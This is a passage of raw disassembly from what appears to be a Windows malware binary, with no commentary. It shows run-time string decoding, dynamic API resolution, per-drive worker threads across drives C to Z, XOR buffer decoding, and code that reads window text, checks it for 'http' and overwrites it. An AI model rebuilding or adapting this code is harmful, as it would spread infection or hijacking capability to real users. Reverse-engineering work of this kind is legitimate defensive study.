jmp short loc_43E44F
; ---------------------------------------------------------------------------
loc_43E443: ; CODE XREF: sub_43E40A+51�j
lea ebx, ds:446130h[edi*4]
cmp esi, ebx
jz short loc_43E45D
inc edi
loc_43E44F: ; CODE XREF: sub_43E40A+37�j
mov eax, dword_44B108
add eax, 3E8h
cmp edi, eax
jb short loc_43E443
loc_43E45D: ; CODE XREF: sub_43E40A+42�j
movsx eax, word_44B114
add eax, 3E6h
cmp edi, eax
jnz short loc_43E474
xor eax, eax
jmp loc_43E5CE
; ---------------------------------------------------------------------------
loc_43E474: ; CODE XREF: sub_43E40A+61�j
movzx esi, ds:word_447A50[edi*2]
movsx ebx, word_44B0D0
inc ebx
cmp esi, ebx
jnz short loc_43E4AF
movzx eax, ds:byte_447200[edi]
push eax
push ds:dword_445060[edi*4]
call sub_43B260
add esp, 8
and ds:dword_446130[edi*4], 0
xor eax, eax
jmp loc_43E5CE
; ---------------------------------------------------------------------------
loc_43E4AF: ; CODE XREF: sub_43E40A+7C�j
movzx esi, ds:word_447A50[edi*2]
movsx ebx, word_44B0E8
movsx edx, word_44B114
lea ebx, [ebx+edx+0FFF8h]
cmp esi, ebx
jnz loc_43E5A8
mov eax, dword_44B198
sub eax, 8
mov [ebp+var_4], eax
jmp loc_43E58B
; ---------------------------------------------------------------------------
loc_43E4E4: ; CODE XREF: sub_43E40A+194�j
mov esi, [ebp+var_4]
mov ebx, esi
shl ebx, 2
cmp ds:dword_446130[ebx], 0
jz loc_43E588
movzx edx, ds:word_447A50[esi*2]
movsx ecx, word_44B1A8
mov eax, dword_44B0B8
lea ecx, [ecx+eax+0FFFBh]
cmp edx, ecx
jz short loc_43E588
mov edx, ds:dword_445060[edi*4]
cmp ds:dword_445060[ebx], edx
jnz short loc_43E588
mov bl, ds:byte_447200[esi]
cmp bl, ds:byte_447200[edi]
jnz short loc_43E588
movzx esi, ds:word_447A50[esi*2]
mov ebx, dword_44B118
add ebx, dword_44B184
sub ebx, 6
cmp esi, ebx
jnz short loc_43E579
mov esi, [ebp+var_4]
movzx ebx, ds:byte_447200[esi]
push ebx
push ds:dword_445060[esi*4]
call sub_43B260
add esp, 8
and ds:dword_446130[edi*4], 0
jmp short loc_43E5A4
; ---------------------------------------------------------------------------
loc_43E579: ; CODE XREF: sub_43E40A+148�j
mov esi, [ebp+var_4]
lea esi, ds:447A50h[esi*2]
dec word ptr [esi]
jmp short loc_43E5A4
; ---------------------------------------------------------------------------
loc_43E588: ; CODE XREF: sub_43E40A+EA�j
; sub_43E40A+10D�j ...
inc [ebp+var_4]
loc_43E58B: ; CODE XREF: sub_43E40A+D5�j
mov eax, dword_44B178
add eax, 3E0h
add eax, dword_44B12C
cmp [ebp+var_4], eax
jb loc_43E4E4
loc_43E5A4: ; CODE XREF: sub_43E40A+16D�j
; sub_43E40A+17C�j
xor eax, eax
jmp short loc_43E5CE
; ---------------------------------------------------------------------------
loc_43E5A8: ; CODE XREF: sub_43E40A+C4�j
movzx esi, ds:word_447A50[edi*2]
movsx ebx, word_44B150
add ebx, dword_44B1CC
sub ebx, 8
cmp esi, ebx
jle short loc_43E5CC
dec ds:word_447A50[edi*2]
loc_43E5CC: ; CODE XREF: sub_43E40A+1B8�j
xor eax, eax
loc_43E5CE: ; CODE XREF: sub_43E40A+65�j
; sub_43E40A+A0�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43E40A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E5D5 proc near ; CODE XREF: sub_443589+19B�p
; sub_443589+1BC�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call ds:dword_44A770 ; GetTickCount
mov [ebp+var_8], eax
mov esi, dword_44B124
dec esi
jmp short loc_43E632
; ---------------------------------------------------------------------------
loc_43E5F3: ; CODE XREF: sub_43E5D5+6F�j
cmp ds:dword_446130[esi*4], 0
jz short loc_43E631
mov edx, ds:dword_449660[esi*4]
movsx ecx, word_44B180
add ecx, 0EA5Ah
mov eax, dword_44B138
add eax, dword_44B0EC
sub eax, 8
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_43E631
and ds:dword_446130[esi*4], 0
loc_43E631: ; CODE XREF: sub_43E5D5+26�j
; sub_43E5D5+52�j
inc esi
loc_43E632: ; CODE XREF: sub_43E5D5+1C�j
mov eax, dword_44B0A8
add eax, 3E4h
add eax, dword_44B0D4
cmp esi, eax
jb short loc_43E5F3
loc_43E646: ; CODE XREF: sub_43E5D5+94�j
; sub_43E5D5+266�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_43E841
movsx eax, word_44B0E0
add eax, 4
cmp [ebp+var_14], eax
ja short loc_43E646
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43E670: ; CODE XREF: sub_43E5D5+A0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E670
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
mov edx, dword_44B10C
sub edx, 3
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
movsx eax, word_44B0E0
movsx edx, word_44B19C
add eax, edx
sub eax, 6
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_43E6AE
mov [ebp+var_1], 43h
loc_43E6AE: ; CODE XREF: sub_43E5D5+D3�j
mov edi, dword_44B138
sub edi, 8
jmp short loc_43E6E0
; ---------------------------------------------------------------------------
loc_43E6B9: ; CODE XREF: sub_43E5D5+120�j
cmp ds:dword_446130[edi*4], 0
jz short loc_43E6DF
mov edx, [ebp+var_C]
cmp ds:dword_445060[edi*4], edx
jnz short loc_43E6DF
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_1]
jz loc_43E825
loc_43E6DF: ; CODE XREF: sub_43E5D5+EC�j
; sub_43E5D5+F8�j
inc edi
loc_43E6E0: ; CODE XREF: sub_43E5D5+E2�j
mov eax, dword_44B130
add eax, 3E4h
movsx edx, word_44B110
add eax, edx
cmp edi, eax
jb short loc_43E6B9
mov eax, dword_44B13C
add eax, 3BEh
cmp [ebp+var_10], eax
jbe loc_43E7D7
mov eax, dword_44B1B0
add eax, 9
movsx edx, word_44B180
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_44244A
add esp, 8
mov eax, dword_44B0F8
add eax, 3B5h
movsx edx, word_44B100
add eax, edx
mov [ebp+var_18], eax
movsx eax, word_44B0BC
sub eax, 9
mov [ebp+var_1C], eax
loc_43E74B: ; CODE XREF: sub_43E5D5+1FD�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, dword_44B13C
add edx, dword_44B12C
sub edx, 7
mov [ebx+eax], dl
push offset dword_446020
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, dword_44B178
add eax, dword_44B198
sub eax, 0Bh
and eax, 0FFh
push eax
call sub_43D8A3
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, dword_44B094
add eax, 3B7h
add eax, dword_44B1C0
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_43E7CA
mov [ebp+var_18], eax
loc_43E7CA: ; CODE XREF: sub_43E5D5+1F0�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_43E820
jmp loc_43E74B
; ---------------------------------------------------------------------------
loc_43E7D7: ; CODE XREF: sub_43E5D5+12F�j
push offset byte_44C4BF
call sub_4424C1
push offset dword_446020
push [ebp+var_10]
movsx edx, word_44B110
add edx, dword_44B184
sub edx, 0Ah
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word_44B0C8
sub edx, 7
and edx, 0FFh
push edx
call sub_43D8A3
add esp, 28h
loc_43E820: ; CODE XREF: sub_43E5D5+1FB�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_43E825: ; CODE XREF: sub_43E5D5+104�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
movsx edx, word_44B180
add edx, 0Eh
cmp [eax], edx
jbe loc_43E646
loc_43E841: ; CODE XREF: sub_43E5D5+81�j
push offset byte_44C4BB
call sub_4424C1
push offset dword_446020
mov edx, dword_44B0EC
sub edx, 5
push edx
mov edx, dword_44B0F0
add edx, dword_44B14C
sub edx, 0Ah
push edx
push eax
mov edx, dword_44B0B4
sub edx, 8
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, dword_44B164
movsx ecx, word_44B0D8
add edx, ecx
sub edx, 4
and edx, 0FFh
push edx
call sub_43D8A3
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_43E5D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43E8A2 proc near ; DATA XREF: sub_442C0A+222�o
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_43E8BB
; ---------------------------------------------------------------------------
loc_43E8B2: ; CODE XREF: sub_43E8A2+1C�j
and ds:dword_44A790[esi*4], 0
inc esi
loc_43E8BB: ; CODE XREF: sub_43E8A2+E�j
cmp esi, 5Ah
jbe short loc_43E8B2
loc_43E8C0: ; CODE XREF: sub_43E8A2+19B�j
mov edi, 43h
jmp loc_43EA22
; ---------------------------------------------------------------------------
loc_43E8CA: ; CODE XREF: sub_43E8A2+183�j
movsx eax, word_44B128
add eax, dword_44B1C0
sub eax, 3
push eax
call ds:dword_44A630
push offset byte_44C4B3
call sub_4424C1
push edi
push eax
lea ebx, [ebp+var_E]
push ebx
call ds:dword_44A634
add esp, 14h
cmp ds:dword_44A790[edi*4], 0
jz short loc_43E944
mov eax, dword_44B140
add eax, dword_44B184
sub eax, 0Eh
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ds:dword_44A790[edi*4]
call ds:dword_44A64C ; GetExitCodeThread
cmp [ebp+var_14], 103h
jz short loc_43E944
push ds:dword_44A790[edi*4]
call ds:dword_449650 ; CloseHandle
and ds:dword_44A790[edi*4], 0
loc_43E944: ; CODE XREF: sub_43E8A2+60�j
; sub_43E8A2+8B�j
lea eax, [ebp+var_E]
push eax
call ds:dword_44A664 ; GetDriveTypeA
mov [ebp+var_4], eax
cmp eax, 3
jz short loc_43E98D
cmp eax, 4
jz short loc_43E98D
cmp eax, 2
jz short loc_43E98D
cmp ds:dword_44A790[edi*4], 0
jz loc_43EA21
movsx ebx, word_44B1BC
movsx edx, word_44B19C
add ebx, edx
sub ebx, 0Ch
mov ds:dword_447630[edi*4], ebx
jmp loc_43EA21
; ---------------------------------------------------------------------------
loc_43E98D: ; CODE XREF: sub_43E8A2+B2�j
; sub_43E8A2+B7�j ...
push 1
call ds:dword_446000 ; SetErrorMode
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_E]
push eax
call ds:dword_4470D4 ; GetDiskFreeSpaceA
mov ebx, dword_44B190
sub ebx, 3
cmp eax, ebx
jnz short loc_43E9D8
cmp ds:dword_44A790[edi*4], 0
jz short loc_43EA21
mov ebx, dword_44B1C0
sub ebx, 3
mov ds:dword_447630[edi*4], ebx
jmp short loc_43EA21
; ---------------------------------------------------------------------------
loc_43E9D8: ; CODE XREF: sub_43E8A2+118�j
cmp ds:dword_44A790[edi*4], 0
jnz short loc_43EA21
mov ds:dword_447630[edi*4], edi
lea eax, [ebp+var_28]
push eax
movsx eax, word_44B194
push eax
lea ebx, ds:447630h[edi*4]
push ebx
push offset sub_43B4C6
mov ebx, dword_44B134
add ebx, dword_44B178
sub ebx, 6
push ebx
push 0
call ds:dword_44AB90 ; CreateThread
mov ds:dword_44A790[edi*4], eax
loc_43EA21: ; CODE XREF: sub_43E8A2+C6�j
; sub_43E8A2+E6�j ...
inc edi
loc_43EA22: ; CODE XREF: sub_43E8A2+23�j
cmp edi, 5Ah
jbe loc_43E8CA
movsx eax, word_44B0B0
sub eax, 8
push eax
call ds:dword_44A630
pop ecx
jmp loc_43E8C0
sub_43E8A2 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_43EA49 proc near ; DATA XREF: .data:0044B2C8�o
mov eax, 80004001h
retn 18h
sub_43EA49 endp
; =============== S U B R O U T I N E =======================================
sub_43EA51 proc near ; CODE XREF: sub_442C0A+C�p
push edi
push offset byte_44C4A5
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1DC, eax
test eax, eax
jnz short loc_43EA84
push offset byte_44C497
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1DC, eax
loc_43EA84: ; CODE XREF: sub_43EA51+1A�j
push offset dword_44C484
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A60C, eax
push offset byte_44C471
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449648, eax
push offset byte_44C45F
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447614, eax
push offset word_44C44E
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448224, eax
push offset word_44C43A
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445050, eax
push offset byte_44C429
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446010, eax
push offset word_44C412
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F0, eax
push offset byte_44C403
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448368, eax
push offset word_44C3F6
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445004, eax
push offset dword_44C3E4
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A628, eax
push offset byte_44C3D3
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A650, eax
push offset byte_44C3C1
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABA4, eax
push offset word_44C3B2
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448220, eax
push offset byte_44C3A5
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A620, eax
push offset word_44C396
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A640, eax
push offset dword_44C388
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445040, eax
push offset word_44C376
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470DC, eax
push offset word_44C366
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445014, eax
push offset word_44C35A
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A40, eax
push offset word_44C34E
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A604, eax
push offset dword_44C33C
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F8, eax
push offset word_44C32A
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A654, eax
push offset dword_44C31C
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A658, eax
push offset dword_44C308
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A77C, eax
push offset byte_44C2F7
call sub_4424C1
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A638, eax
push offset byte_44C2E1
call sub_4424C1
add esp, 68h
push eax
push dword_44B1DC
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445048, eax
pop edi
retn
sub_43EA51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ED61 proc near ; CODE XREF: sub_43C256:loc_43C259�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44B190
add eax, dword_44B0F8
sub eax, 5
push eax
push 0
push 20h
push 0
call ds:dword_447A44
lea eax, [ebp+var_10]
push eax
call ds:dword_44825C ; GetSystemTime
mov eax, dword_44B0A0
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_8]
mov ebx, dword_44B09C
add ebx, 34h
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_A]
mov ebx, dword_44B158
add ebx, 18h
add ebx, dword_44B188
imul ecx, ebx
mov ebx, dword_44B134
add ebx, 39h
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_E]
mov ebx, dword_44B0A0
add ebx, 1Ah
imul ecx, ebx
mov ebx, dword_44B0D4
add ebx, 16h
add ebx, dword_44B0C0
imul ecx, ebx
movsx ebx, word_44B100
movsx esi, word_44B194
lea ebx, [ebx+esi+33h]
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_10]
movsx ebx, word_44B154
add ebx, 4
imul ecx, ebx
mov ebx, dword_44B094
add ebx, 16h
add ebx, dword_44B0A4
imul ecx, ebx
movsx ebx, word_44B19C
lea eax, [ebx+eax+0Eh]
imul ecx, eax
mov eax, dword_44B0CC
add eax, 36h
movsx ebx, word_44B150
add eax, ebx
imul ecx, eax
mov eax, edx
add eax, ecx
mov ds:dword_445024, eax
mov eax, dword_44B108
inc eax
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_43DAAC
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_43ED61 endp
; =============== S U B R O U T I N E =======================================
sub_43EE98 proc near ; DATA XREF: .data:0044B2EC�o
mov eax, 80004001h
retn 18h
sub_43EE98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EEA0 proc near ; CODE XREF: sub_442318+5F�p
var_100B = byte ptr -100Bh
var_1005 = byte ptr -1005h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444B40
push ebx
push esi
push edi
push offset byte_44C2CF
call sub_4424C1
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call ds:dword_44A638 ; FindWindowExA
mov edi, eax
or edi, edi
jnz short loc_43EED2
mov edi, [ebp+arg_0]
loc_43EED2: ; CODE XREF: sub_43EEA0+2D�j
push offset byte_44C2B9
call sub_4424C1
pop ecx
push 0
push eax
push 0
push edi
call ds:dword_44A638 ; FindWindowExA
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call ds:dword_445014 ; SendMessageA
movsx eax, word_44B0D0
cmp [ebp+eax+var_FFF], 20h
jnz short loc_43EF2D
mov eax, dword_44B1AC
movsx edx, word_44B0BC
add eax, edx
cmp [ebp+eax+var_100B], 20h
jz loc_43EFD2
loc_43EF2D: ; CODE XREF: sub_43EEA0+6F�j
mov eax, dword_44B17C
cmp [ebp+eax+var_1005], 68h
jnz short loc_43EF57
movsx eax, word_44B128
mov edx, dword_44B158
lea eax, [eax+edx+1]
cmp [ebp+eax+var_FFF], 74h
jz short loc_43EFD2
loc_43EF57: ; CODE XREF: sub_43EEA0+9A�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_43EF60: ; CODE XREF: sub_43EEA0+C5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43EF60
mov ebx, dword_44B12C
add ebx, 8
movsx edx, word_44B128
add ebx, edx
cmp eax, ebx
jb short loc_43EFD2
push offset dword_44C2B4
call sub_4424C1
movsx esi, word_44B114
add esi, 2
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_43D744
add esp, 10h
movsx ebx, word_44B150
add ebx, 0FFFAh
cmp eax, ebx
jnz short loc_43EFD2
push offset word_44C2AE
call sub_4424C1
pop ecx
push eax
mov esi, dword_44B0C4
sub esi, 4
push esi
push 0Ch
push edi
call ds:dword_445014 ; SendMessageA
loc_43EFD2: ; CODE XREF: sub_43EEA0+87�j
; sub_43EEA0+B5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43EEA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EFD7 proc near ; CODE XREF: sub_43B780+1B�p
; sub_43D8A3+1A4�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44B1D0, 0
jnz short loc_43EFFF
push offset dword_44ABC0
call ds:dword_446008 ; InitializeCriticalSection
mov dword_44B1D0, 1
loc_43EFFF: ; CODE XREF: sub_43EFD7+11�j
mov esi, dword_44B134
add esi, 3
movsx ebx, word_44B1A8
add esi, ebx
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
mov edx, dword_44B158
add edx, 2
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44B0A4
add edx, 4
cmp eax, edx
jz loc_43F0E2
push offset dword_44ABC0
call ds:dword_44A65C ; RtlEnterCriticalSection
movsx eax, word_44B154
sub eax, 2
mov [ebp+var_2], ax
jmp short loc_43F08F
; ---------------------------------------------------------------------------
loc_43F065: ; CODE XREF: sub_43EFD7+C2�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, dword_44B0EC
add edx, dword_44B1B0
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_43F08F: ; CODE XREF: sub_43EFD7+8C�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43F065
movsx eax, word_44B0D8
movsx edx, word_44B16C
add eax, edx
sub eax, 9
movsx edx, word_44B148
sub edx, 3
mov [edi+eax], dl
movsx eax, word_44B150
add eax, dword_44B0FC
sub eax, 0Ah
mov edx, dword_44B1B8
sub edx, 3
mov [edi+eax], dl
push offset dword_44ABC0
call ds:dword_44964C ; RtlLeaveCriticalSection
loc_43F0E2: ; CODE XREF: sub_43EFD7+6D�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_43EFD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F0EA proc near ; CODE XREF: sub_4425A3+25�p
var_71F0E = byte ptr -71F0Eh
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50EA3 = byte ptr -50EA3h
var_50EA0 = dword ptr -50EA0h
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_444B40
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call ds:dword_445038
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
mov eax, dword_44B15C
movsx edx, word_44B16C
add eax, edx
sub eax, 8
push eax
push [ebp+arg_0]
call ds:dword_448254
mov ebx, eax
movsx eax, word_44B0E0
cmp ebx, eax
jnz loc_43FEAC
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push offset dword_44C97C
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B150
sub eax, 5
cmp ebx, eax
jnz loc_43FEAC
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, dword_44B124
dec eax
cmp ebx, eax
jnz loc_43FEA0
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_43A9C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call ds:dword_44ABA0
cmp [ebp+var_40E57], 68h
jnz short loc_43F1F7
cmp [ebp+var_40E56], 74h
jnz short loc_43F1F7
cmp [ebp+var_40E55], 74h
jnz short loc_43F1F7
cmp [ebp+var_40E54], 70h
jz short loc_43F1FC
loc_43F1F7: ; CODE XREF: sub_43F0EA+F0�j
; sub_43F0EA+F9�j ...
jmp loc_43FEA0
; ---------------------------------------------------------------------------
loc_43F1FC: ; CODE XREF: sub_43F0EA+10B�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
movsx eax, word_44B114
sub eax, 2
cmp ebx, eax
jz short loc_43F229
and [ebp+var_30E4C], 0
loc_43F229: ; CODE XREF: sub_43F0EA+136�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, dword_44B138
movsx edx, word_44B150
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_43FEA0
lea eax, [ebp+var_40E6C]
push eax
push offset dword_44C8FC
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B1C8
sub eax, 2
cmp ebx, eax
jnz loc_43FE94
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, dword_44B0C4
sub eax, 4
cmp ebx, eax
jnz loc_43FE88
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
